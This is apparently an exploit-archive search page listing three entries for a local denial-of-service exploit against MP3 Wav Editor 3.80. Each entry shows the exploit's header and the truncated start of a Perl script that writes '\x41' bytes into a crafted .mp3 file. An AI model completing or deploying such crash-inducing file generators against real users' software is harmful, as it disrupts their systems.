3 matches found
MP3 Wav Editor 3.80 - .mp3 Local DoS
No description provided by source. Exploit Title: MP3WavEditor Local DoS .mp3 Date: April 5, 2010 Software Link: http://www.mp3waveditor.com/index.htm Version: 3.80 Tested on: Windows XP SP3 Author: anonymous !/usr/bin/perl my $file = yawn.mp3; my $a = \x41; open FILE, $file; print FILE $a; print...
MP3WavEditor Denial Of Service
Exploit Title: MP3WavEditor Local DoS .mp3 Date: April 5, 2010 Software Link: http://www.mp3waveditor.com/index.htm Version: 3.80 Tested on: Windows XP SP3 Author: chap0 Email: chap0x90atgmaildotcom !/usr/bin/perl my $file = "yawn.mp3"; my $a = "\x41"; open FILE, "$file"; print FILE "$a"; print...
MP3 Wav Editor 3.80 - .mp3 Local Denial of Service
MP3 Wav Editor 3.80 - .mp3 Local Denial of Service Exploit Title: MP3WavEditor Local DoS .mp3 Date: April 5, 2010 Software Link: http://www.mp3waveditor.com/index.htm Version: 3.80 Tested on: Windows XP SP3 Author: anonymous !/usr/bin/perl my $file = "yawn.mp3"; my $a = "\x41"; open FILE, "$file"...